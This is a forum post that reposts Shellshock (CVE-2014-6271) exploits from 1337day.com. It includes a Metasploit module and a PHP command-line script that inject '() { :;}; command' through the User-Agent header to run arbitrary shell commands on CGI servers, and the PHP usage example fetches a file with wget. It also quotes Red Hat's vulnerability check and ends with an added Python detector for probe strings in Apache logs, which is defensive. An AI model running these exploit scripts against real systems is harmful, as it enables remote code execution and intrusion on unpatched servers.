Topic: Unix Bash Vulnerability Exploits / 1337day.com Exploits
'[[email protected]]
Comment: #1
28.09.2014 15:47
Friends, it is thought that about 500 million computers will be affected by the newly discovered Bash vulnerability.
News: The Bash Vulnerability Threat in Unix Is Growing!!
Quote: Exploit 1
http://1337day.com/exploit/description/22693
http://1337day.com/exploit/22693
PHP Code:
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'bashedCgi',
            'Description'    => %q{
                Quick dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.
            },
            'Author'         =>
              [
                'Stephane Chazelas',                      # vuln discovery
                'Shaun Colley <scolley at ioactive.com>'  # metasploit module
              ],
            'License'        => MSF_LICENSE,
            'References'     => [ 'CVE', '2014-6271' ],
            'Targets'        =>
                [
                    [ 'cgi', {} ]
                ],
            'DefaultTarget'  => 0,
            'Payload'        =>
                {
                'Space'      => 1024,
                'DisableNops' => true
                },
            'DefaultOptions' => { 'PAYLOAD' => }
        ))

            register_options(
                [
                    OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),
                    OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])
                ], self.class)
    end

    def run
        res = send_request_cgi({
            'method'   => 'GET',
            'uri'      => datastore['TARGETURI'],
            'agent'    => "() { :;}; " + datastore['CMD']
        })

        if res && res.code == 200
            print_good("Command sent - 200 received")
        else
            print_error("Command sent - non-200 reponse")
        end
    end
end

# 85A9CFF0728D13D1   1337day.com [2014-09-28]   1888388C48740A0E # 
Quote: Exploit 2
http://1337day.com/exploit/description/22691
http://1337day.com/exploit/22691
PHP Code:
The following is an excerpt from https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable). Something like:

 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 vulnerable
 this is a test

The patch used to fix this flaw ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:

 $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 bash: warning: x: ignoring function definition attempt
 bash: error importing function definition for `x'
 this is a test

# 484320FF55EDD220   1337day.com [2014-09-28]   F9F8D00661F71520 # 
Quote: Exploit 3
http://1337day.com/exploit/description/22692
http://1337day.com/exploit/22692
PHP Code:
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
       GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
       Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
  
Test CGI Code : #!/bin/bash
        echo "Content-type: text/html"
        echo ""
        echo "Bash-is-Vulnerable"
  
*/
error_reporting(0);
if (!defined('STDIN')) die("Please run it through command-line!\n");
$x = getopt("u:c:");
if (!isset($x['u']) || !isset($x['c']))
{
    die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
}
$url = $x['u'];
$cmd = $x['c'];

$context = stream_context_create(
    array(
        'http' => array(
            'method'  => 'GET',
            'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
        )
    )
);

if (!file_get_contents($url, false, $context) && strpos($http_response_header[0], "500") > 0)
    die("Command sent to the server!\n");
else
    die("Connection Error\n");
?>
 
# CC94A489856180E4   1337day.com [2014-09-28]   CC4089344E68D353 # 

Regards / '[[email protected]]
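Exploits 1 and 3 above both deliver the function-definition string in the User-Agent header, so it shows up in web server access logs. The following is an added example, not part of the original post or of any quoted project: a detector for Apache combined-format logs, where the function name `find_shellshock_probes`, the sample log lines and the client addresses (documentation ranges) are all constructed for illustration.

```python
import re

# Apache "combined" format:
#   ip ident user [time] "request" status bytes "referer" "user-agent"
# Apache writes a double quote inside a logged header as \" so each quoted
# field must allow backslash escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)

# Vulnerable bash imports an environment value as a function when the value
# begins with "() {". Optional whitespace also catches sloppy probes.
FUNC_PREFIX = re.compile(r'\s*\(\)\s*\{')


def find_shellshock_probes(lines):
    """Return (line_no, client_ip, field, status) for each suspicious header."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not a combined-format line
        ip, _request, status, referer, agent = m.groups()
        for field, value in (('referer', referer), ('agent', agent)):
            if FUNC_PREFIX.match(value):
                hits.append((line_no, ip, field, status))
    return hits


# Constructed sample log, not real traffic.
SAMPLE_LOG = [
    r'192.0.2.10 - - [28/Sep/2014:15:40:01 +0000] "GET /cgi-bin/hello HTTP/1.1" 200 19 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    r'198.51.100.7 - - [28/Sep/2014:15:41:12 +0000] "GET /cgi-bin/hello HTTP/1.1" 200 19 "-" "() { :;}; /usr/bin/touch /tmp/metasploit"',
    r'198.51.100.7 - - [28/Sep/2014:15:42:30 +0000] "GET /cgi-bin/hello HTTP/1.1" 500 527 "-" "() { :;}; /bin/bash -c \"id\""',
    r'192.0.2.44 - - [28/Sep/2014:15:43:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; test() { })"',
    r'203.0.113.5 - - [28/Sep/2014:15:44:19 +0000] "GET /cgi-bin/hello HTTP/1.1" 200 19 "() { :; }; echo probe" "curl/7.38.0"',
]

if __name__ == '__main__':
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print('line %d: %s sent a function definition in %s (HTTP %s)' % hit)
```

The combined format records only the Referer and User-Agent headers, so a function definition sent in any other header that a CGI handler exports to the environment will not appear in this log. A hit shows that a request was received, not that bash on the host was vulnerable; the `env x=...` check quoted in Exploit 2 answers that.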